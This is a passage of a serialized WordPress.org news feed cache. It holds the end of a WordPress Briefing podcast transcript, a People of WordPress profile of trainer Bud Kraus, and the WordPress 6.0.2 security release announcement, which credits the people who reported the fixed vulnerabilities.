learn here in their own languages, and yeah. That&#8217;s just a living, breathing issue with a global project, I think.&nbsp;</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:11:56]</strong></p>\n\n\n\n<p>Yeah.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:57]</strong></p>\n\n\n\n<p>Now that we left us on like a really juicy topic, just the lightest thing we could find. Is there anything else that you wanna be sure to share with the WordPress Briefing listeners before we head out?</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:12:10]</strong></p>\n\n\n\n<p>Come and join the training team. Like I said, you don&#8217;t have to be a trainer. You can come in, and help us take notes. You can come in and edit, and review. If you are a subject matter expert, we also have the <a href=\"https://make.wordpress.org/training/handbook/faculty-program/\">faculty program</a>, which was launched. Was it a month ago now?</p>\n\n\n\n<p>Sorry. Days, months, weeks merge for me these days. But yeah, so that&#8217;s like a dedicated volunteer team. And in there, we&#8217;ve got content creators, editors, subject matter experts, and just admin stuff. If you wanna help us with the admin stuff. If you&#8217;re a GitHub guru, get in touch cause we are trying to automate some of our processes, and we could use the help, but yeah, just come join us.</p>\n\n\n\n<p>Join one of our meetings, which run on Tuesdays at 7 AM UTC and 4:00 PM UTC.&nbsp;</p>\n\n\n\n<p>Yes, that&#8217;s right. I get my time right.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:13:03]&nbsp;</strong></p>\n\n\n\n<p>If it&#8217;s not right, we&#8217;ll put it. We&#8217;ll correct it in the show notes.&nbsp;</p>\n\n\n\n<p>Also, if you are not necessarily familiar with the WordPress project and how to get started with contributions, you can find the training team and a lot of information about them and all the other teams on make.wordpress.org.</p>\n\n\n\n<p>I will share that in the show notes as well. make.wordpress.org/training is where you can find Hauwa&#8217;s team. Hauwa, thank you again for joining me today.</p>\n\n\n\n<p><strong>[Hauwa Abashiya 00:13:30]</strong></p>\n\n\n\n<p>No, thank you for having me. It&#8217;s just a wonderful treat. I get to listen to you, and now I get to be on it.&nbsp;</p>\n\n\n\n<p>So, yeah, it&#8217;s good.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:13:37]</strong></p>\n\n\n\n<p>I hope that some of you feel inspired to stop by and see what the team is up to learn something new about WordPress or contribute a little something yourself. And with that, I&#8217;ll bring us home with the small list of big things. First thing, there was a freshly pressed minor release last week. You probably didn&#8217;t notice it.</p>\n\n\n\n<p>It probably went quite smoothly in the background and never interrupted you at all. However, if you want to read what was in it, you can head to wordpress.org/news now, or click on the link in the show notes.&nbsp;</p>\n\n\n\n<p>Second thing, is that coming up at the end of this week, September 9th, 2022, WordCamp US is back and ready to help broaden your WordPress knowledge. If you will be there, I hope it is a wonderful time, but if you won&#8217;t be there in person, I&#8217;ll include a link to register for the live stream, or you can watch all of those sessions afterward on wp.tv or the WordPress YouTube channel.</p>\n\n\n\n<p>Third thing on our list of small list of big things is that WordPress Translation Day is coming up. That&#8217;s normally at the end of September, it coincides with a global day of appreciation for translators just generally across the world. And so that is coming, it&#8217;s normally around the 28th or so.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:14:55]</strong></p>\n\n\n\n<p>So put that in your calendars. As soon as I have any information, as soon as I have a link to share with you all, I will have that for you as well.&nbsp;</p>\n\n\n\n<p>And the final thing on my list today is that if you are hoping to speak at WordCamp Asia, 2023, you have 10 more days, September 15th, 2022**, to apply for that.</p>\n\n\n\n<p>We need topics of all sorts, from security hardening and backend development to entrepreneurial best practices, WordPress out of the box all the way back around to the importance of securing open source freedom. Even when people don&#8217;t know they need them. If you&#8217;ve got something you&#8217;re a bit passionate about, something that you are a passionate expert about especially, we want to see your application. And that, my friends, is your small list of big things.</p>\n\n\n\n<p>Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And I&#8217;ll see you again in a couple of weeks.</p>\n\n\n\n<p><br>** <em><strong>Special note: the deadline to apply as a speaker to WordCamp Asia was extended to September 30th, 2022, after the recording of this episode.</strong></em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13425\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"People of WordPress: Bud Kraus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2022/08/people-of-wordpress-bud-kraus/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 31 Aug 2022 21:30:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:10:\"Interviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"HeroPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:19:\"People of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13385\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:135:\"The latest People of WordPress story features trainer Bud Kraus, from the United States, talking about the software and how he uses it.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"webcommsat AbhaNonStopNewsUK\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14109:\"\n<p><strong>This month, as we approach <a href=\"https://us.wordcamp.org/2022/\">WordCamp US</a>, we feature Bud Kraus, a WordPress trainer who has made a career in helping others learn about software. He also shares how he has developed an approach to using technology in order to overcome longstanding difficulties with his eyesight.</strong></p>\n\n\n\n<p><strong>In this People of WordPress series, we share some of the inspiring stories of how WordPress and its global network of contributors can change people’s lives for the better.</strong></p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1014\" height=\"627\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-aug-powp.jpg?resize=1014%2C627&#038;ssl=1\" alt=\"Bud Kraus playing the guitar\" class=\"wp-image-13341\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-aug-powp.jpg?w=1014&amp;ssl=1 1014w, https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-aug-powp.jpg?resize=300%2C186&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-aug-powp.jpg?resize=768%2C475&amp;ssl=1 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>Bud Kraus</em> with his guitar</figcaption></figure>\n\n\n\n<h2>Teaching WordPress strengthens your understanding</h2>\n\n\n\n<p>Bud has taught web design since 1998, with students from more than 80 countries online or in person. He was determined not to let his sight difficulties stop him from his wish to  help others learn website building and maintenance skills.   </p>\n\n\n\n<p>As WordPress evolves and new features release, Bud decided to extend his training services around helping new and existing users improve and practice their skills. He supports others in open source through volunteering to speak at WordPress events, and encourages others to do so too. He also gives time to help produce material for the free-to-access resource <a href=\"https://learn.wordpress.org/\">Learn WordPress,</a> which is part of the WordPress.org project.&nbsp;</p>\n\n\n\n<p>As a contributor to the <a href=\"https://make.wordpress.org/test/\">Test</a> and <a href=\"https://make.wordpress.org/training/\">Training</a> teams, Bud is keen for others to try contributing to these areas and help support the project&#8217;s future development. One of his current training priorities is to help people with using the block editor and Full Site Editing. He is an advocate for the usability of WordPress today, saying: “I can design all aspects of a website now with a block.”</p>\n\n\n\n<h2>Using WordPress as a traditional developer</h2>\n\n\n\n<p>Bud’s WordPress journey began with a lunch at Grand Central Station in New York in 2009. A friend and former client was promoting the idea of using WordPress, which Bud initially resisted.</p>\n\n\n\n<p>“I’m a code guy…,” he told his friend at the time. “I will never use anything like that.”</p>\n\n\n\n<p>However, the friend persisted. Eventually, Bud gave it a try and found a new approach with things called themes and plugins. His first encounter was with <a href=\"https://wordpress.org/download/releases/\">WordPress 2.6</a>. Bud signed up with a hosting company and found a theme where he could learn to edit and understand child themes.</p>\n\n\n\n<p>He said: &#8220;Once I saw that you could edit anything and make it yours, I was hooked. The endorphins were freely coursing through my veins.&#8221; Bud was hooked.</p>\n\n\n\n<h2>Teaching WordPress strengthens your own understanding of the software</h2>\n\n\n\n<p>There’s an old saying that the best way to learn something new is to turn around and teach someone else.</p>\n\n\n\n<p>Bud was already an instructor at the Fashion Institute of Technology when he thought, “I could teach WordPress!”</p>\n\n\n\n<p>And so he did, packing classrooms all through those first years of WordPress as it swept through the design world and further.<br><br>But Bud had more to discover. He said: &#8220;Two big things were about to happen that were really going to change my life. They would show me the way to the WordPress community – not that I even knew what that was.&#8221;</p>\n\n\n\n<h2>Sharing lessons learnt with the WordPress community</h2>\n\n\n\n<p>In 2014, one of his students suggested he start going to the New York WordPress Meetup.&nbsp;</p>\n\n\n\n<p>As he started going to WordCamps in New York City, he realized that WordPress was getting very large. What’s more, it had a community of people with whom he felt at home and could learn alongside.</p>\n\n\n\n<p>Bud gave a talk for the first time in 2016 at the only WordCamp to this day that has been held at the United Nations. He shared his knowledge of “Lessons Learned: Considerations For Teaching Your Clients WordPress.”&nbsp;</p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"952\" height=\"1024\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-1.jpg?resize=952%2C1024&#038;ssl=1\" alt=\"Bud Kraus talking at a WordCamp\" class=\"wp-image-13340\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-1.jpg?w=952&amp;ssl=1 952w, https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-1.jpg?resize=279%2C300&amp;ssl=1 279w, https://i2.wp.com/wordpress.org/news/files/2022/08/bud-kraus-1.jpg?resize=768%2C826&amp;ssl=1 768w\" sizes=\"(max-width: 952px) 100vw, 952px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>Bud Kraus speaks at WordCamps to help people use the software even more effectively</em></figcaption></figure>\n\n\n\n<p>From there, Bud went on to speak at other WordCamps in the US. He also volunteered as a speaker wrangler for his home camp in New York City in 2018 and 2019.</p>\n\n\n\n<h2>From speaking to writing about WordPress</h2>\n\n\n\n<p>At some point before the Covid-19 lockdown, Bud found another outlet, this time in writing.&nbsp;</p>\n\n\n\n<p>Bud heard a magazine was advertising for submissions related to WordPress.&nbsp;His first attempted article did not make the cut.</p>\n\n\n\n<p>So in his second submission, Bud took the risk of writing about something deeply personal – a topic he really didn’t want to write about at all.</p>\n\n\n\n<p>He gathered his courage and revealed to the entire web design world that he was legally blind.</p>\n\n\n\n<p>The article appeared as&nbsp; <strong>“</strong><a href=\"https://www.smashingmagazine.com/2018/05/using-low-vision-teach-wordpress/\"><strong>Using Low Vision As My Tool To Help Me Teach WordPress</strong></a><strong>”.</strong></p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"510\" height=\"600\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/09/bud-kraus-2.jpg?resize=510%2C600&#038;ssl=1\" alt=\"Bud Kraus\" class=\"wp-image-13426\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/09/bud-kraus-2.jpg?w=510&amp;ssl=1 510w, https://i0.wp.com/wordpress.org/news/files/2022/09/bud-kraus-2.jpg?resize=255%2C300&amp;ssl=1 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\">Bud Kraus</figcaption></figure>\n\n\n\n<p>Since the age of 37, Bud has had macular degeneration in both eyes, which affects his central vision. It is a leading cause of legal blindness in the United States and many other countries.&nbsp;</p>\n\n\n\n<p>He relies on his peripheral vision and finding ways to compensate. He also tends to see things in a flat dimension and has a difficulty discerning contrast&nbsp; &#8211; he&nbsp; is glad there are starting to be improvements in color contrasts in web design!<br><br>He uses tools like Speech to Text, larger sized cursors and bigger font sizes, and heavily uses zooming back in and out when working with WordPress. He is able to recognize patterns but has to rely on detailed preparation and memorizing materials.&nbsp;</p>\n\n\n\n<p>In his first magazine article acknowledging this situation, he shared the added difficulties that technology creates for people with visual conditions, and tips that he had found to try and find alternative routes around them. He uses the technique of finding alternatives in his training work to help people learn and understand, realizing that all people have different ways of reading and understanding. His words and subsequent stories have inspired others and enabled more people to highlight accessibility. He describes himself as a ‘stakeholder in ensuring that the WordPress admin is accessible.’</p>\n\n\n\n<p>A year after its first publication, the piece became a WordCamp talk, ‘My Way with WordPress.’ The talk was a hit and started many conversations about accessibility and the importance of raising awareness.</p>\n\n\n\n<p>A few months later, he gave a Gutenberg talk at the first WordCamp Montclair. There was no way he could have done it from a laptop, so instead, he did it from his 27” desktop computer. </p>\n\n\n\n<p>Bud said: &#8220;It was a presentation on Gutenberg plugins. Since I couldn’t do this from a notebook screen (the screen is too small and the keyboard is hard for me to manipulate), it was decided that I would bring in my 27″ desktop machine to a WordCamp. I’m probably the first person to ever have done this. It was good thing I only lived a few miles away.&#8221;</p>\n\n\n\n<p>He added: “I sat behind my computer, did my thing, and every once in a while peered out to make sure people were still there.”</p>\n\n\n\n<h2>Different ways of contributing to WordPress</h2>\n\n\n\n<p>One of the main ways Bud supported the community around the software was through talks at WordCamps and helping others to speak. </p>\n\n\n\n<p>During the Covid-19 pandemic, he was keen to continue contributing when WordCamps were no longer meeting in person. He turned greater attention to supporting the <a href=\"https://learn.wordpress.org/\">Learn WordPress</a> resource, a free to use learning platform made by and for the community itself.&nbsp;</p>\n\n\n\n<p>More training materials on the block editor can be found on Learn WordPress and his WordCamp talks are available on <a href=\"https://wordpress.tv/?s=kraus&amp;speakers=bud-kraus\">WordPress.tv</a>.</p>\n\n\n\n<h2>Global reach and meaning through WordPress</h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"600\" height=\"800\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/08/bud-kraus-with-josepha.jpg?resize=600%2C800&#038;ssl=1\" alt=\"Bud Kraus with Josepha\" class=\"wp-image-13342\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/08/bud-kraus-with-josepha.jpg?w=600&amp;ssl=1 600w, https://i0.wp.com/wordpress.org/news/files/2022/08/bud-kraus-with-josepha.jpg?resize=225%2C300&amp;ssl=1 225w\" sizes=\"(max-width: 600px) 100vw, 600px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>Bud Kraus with Josepha Haden Chomphosy at WordCamp Montclair, NJ 2022</em></figcaption></figure>\n\n\n\n<p>Bud’s training materials and willingness to talk about accessibility have helped so many people find their way with WordPress. He in turn is an advocate for the community around open source.</p>\n\n\n\n<p>He said: “The software is really good, and the people are even better.” &nbsp;</p>\n\n\n\n<p>He added: “I get a sense of accomplishment whenever I launch a new or redesigned site. It’s also given me a great feeling to know that many people have learned WordPress around the world from my <a href=\"https://wordpress.tv/?s=kraus&amp;speakers=bud-kraus\">talks and presentations</a>. This might just be the most gratifying thing of all.”</p>\n\n\n\n<h2>Share the stories</h2>\n\n\n\n<p>Help share these stories of open source contributors and continue to grow the community. Meet more WordPressers in the <a href=\"https://wordpress.org/news/category/newsletter/interviews/\">People of WordPress series</a>.</p>\n\n\n\n<h2>Contributors</h2>\n\n\n\n<p>Thanks to Abha Thakor (<a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>), Mary Baum (<a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a>), Surendra Thakor (<a href=\'https://profiles.wordpress.org/sthakor/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sthakor</a>), Meher Bala (<a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a>), Larissa Murillo (<a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a>), and Chloe Bringmann (<a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>), for work on this feature. Thank you too to Bud Kraus (<a href=\'https://profiles.wordpress.org/trynet/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>trynet</a>) for sharing his experiences.</p>\n\n\n\n<p>Thank you to Josepha Haden (<a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a>) and Topher DeRosia (<a href=\'https://profiles.wordpress.org/topher1kenobe/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>topher1kenobe</a>) for their support of the <em>People of WordPress</em> series.</p>\n\n\n\n<div class=\"wp-block-media-text is-stacked-on-mobile is-vertically-aligned-center\" style=\"grid-template-columns:29% auto\"><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" loading=\"lazy\" width=\"180\" height=\"135\" src=\"https://i1.wp.com/wordpress.org/news/files/2020/03/heropress_logo_180.png?resize=180%2C135&#038;ssl=1\" alt=\"HeroPress logo\" class=\"wp-image-8409 size-full\" data-recalc-dims=\"1\" /></figure><div class=\"wp-block-media-text__content\">\n<p class=\"has-small-font-size\"><em>This People of WordPress feature is inspired by an essay originally published on </em><a href=\"https://heropress.com/\"><em>HeroPress.com</em></a><em>, a community initiative created by Topher DeRosia. It highlights people in the WordPress community who have overcome barriers and whose stories might otherwise go unheard. </em>#HeroPress </p>\n</div></div>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"13385\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 6.0.2 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 30 Aug 2022 19:39:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"6.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:5:\"6.0.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:14:\"minor-releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:8:\"releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13346\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:299:\"WordPress 6.0.2 is now available for download. This security and maintenance release features several updates since WordPress 6.0.1 in July 2022. You can review a summary of the key changes in this release by visiting https://make.wordpress.org/core/2022/08/23/wordpress-6-0-2-rc1-is-now-available/.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Dan Soschin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5702:\"\n<p><strong>WordPress 6.0.2</strong> is now available!</p>\n\n\n\n<p>This security and maintenance release features <a href=\"https://core.trac.wordpress.org/query?milestone=6.0.2\">12 bug fixes on Core</a>, <a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.0\">5 bug fixes</a> for the Block Editor, and 3 security fixes. Because this is a <strong>security release</strong>, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.</p>\n\n\n\n<p>WordPress 6.0.2 is a short-cycle release. You can review a summary of the main updates in this release by reading the <a href=\"https://make.wordpress.org/core/2022/08/23/wordpress-6-0-2-rc1-is-now-available/\">RC1 announcement</a>.</p>\n\n\n\n<p>The next major release will be <a href=\"https://make.wordpress.org/core/6-1/\">version 6.1</a> planned for November 1, 2022.</p>\n\n\n\n<p>If you have sites that support automatic background updates, the update process will begin automatically.</p>\n\n\n\n<p>You can <a href=\"https://wordpress.org/wordpress-6.0.2.zip\">download WordPress 6.0.2 from WordPress.org</a>, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.</p>\n\n\n\n<p>For more information on this release, please <a href=\"https://wordpress.org/support/wordpress-version/version-6-0-2\">visit the HelpHub site</a>.</p>\n\n\n\n<h2>Security updates included in this release</h2>\n\n\n\n<p>The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release:</p>\n\n\n\n<ul>\n<li>Fariskhi Vidyan for finding a possible SQL injection within the Link API.</li>\n\n\n\n<li><a href=\"https://hackerone.com/entropy1337\">Khalilov Moe</a> for finding an XSS vulnerability on the Plugins screen.</li>\n\n\n\n<li><a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a> of the WordPress security team, for finding an output escaping issue within <code>the_meta()</code>.</li>\n</ul>\n\n\n\n<h2>Thank you to these WordPress contributors</h2>\n\n\n\n<p>The WordPress 6.0.2 release was led by <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">@sergeybiryukov</a> and <a href=\"https://profiles.wordpress.org/gziolo/\">@gziolo</a>.</p>\n\n\n\n<p>WordPress 6.0.2 would not have been possible without the contributions of more than 50 people. Their asynchronous coordination to deliver several enhancements and fixes into a stable release is a testament to the power and capability of the WordPress community.</p>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a>,&nbsp;<a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a>,&nbsp;<a href=\"https://profiles.wordpress.org/annezazu/\">annezazu</a>,&nbsp;<a href=\"https://profiles.wordpress.org/antonvlasenko/\">Anton Vlasenko</a>,&nbsp;<a href=\"https://profiles.wordpress.org/aristath/\">Ari Stathopoulos</a>,&nbsp;<a href=\"https://profiles.wordpress.org/scruffian/\">Ben Dwyer</a>,&nbsp;<a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>,&nbsp;<a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a>,&nbsp;<a href=\"https://profiles.wordpress.org/uofaberdeendarren/\">Darren Coutts</a>,&nbsp;<a href=\"https://profiles.wordpress.org/dilipbheda/\">Dilip Bheda</a>,&nbsp;<a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>,&nbsp;<a href=\"https://profiles.wordpress.org/martinkrcho/\">eMKey</a>,&nbsp;<a href=\"https://profiles.wordpress.org/fabiankaegy/\">Fabian Kägy</a>,&nbsp;<a href=\"https://profiles.wordpress.org/mamaduka/\">George Mamadashvili</a>,&nbsp;<a href=\"https://profiles.wordpress.org/gziolo/\">Greg Ziółkowski</a>,&nbsp;<a href=\"https://profiles.wordpress.org/huubl/\">huubl</a>,&nbsp;<a href=\"https://profiles.wordpress.org/ironprogrammer/\">ironprogrammer</a>,&nbsp;<a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>,&nbsp;<a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a>,&nbsp;<a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>,&nbsp;<a href=\"https://profiles.wordpress.org/jonmackintosh/\">jonmackintosh</a>,&nbsp;<a href=\"https://profiles.wordpress.org/spacedmonkey/\">Jonny Harris</a>, <a href=\"https://profiles.wordpress.org/ryelle/\">Kelly Choyce-Dwan</a>,&nbsp;<a href=\"https://profiles.wordpress.org/0mirka00/\">Lena Morita</a>,&nbsp;<a href=\"https://profiles.wordpress.org/rudlinkon/\">Linkon Miyan</a>,&nbsp;<a href=\"https://profiles.wordpress.org/lovor/\">Lovro Hrust</a>,&nbsp;<a href=\"https://profiles.wordpress.org/marybaum/\">marybaum</a>,&nbsp;<a href=\"https://profiles.wordpress.org/ndiego/\">Nick Diego</a>,&nbsp;<a href=\"https://profiles.wordpress.org/ntsekouras/\">Nik Tsekouras</a>, <a href=\"https://profiles.wordpress.org/oglekler/\">Olga Gleckler</a>,&nbsp;<a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a>,&nbsp;<a href=\"https://profiles.wordpress.org/paulkevan/\">paulkevan</a>,&nbsp;<a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>,&nbsp;<a 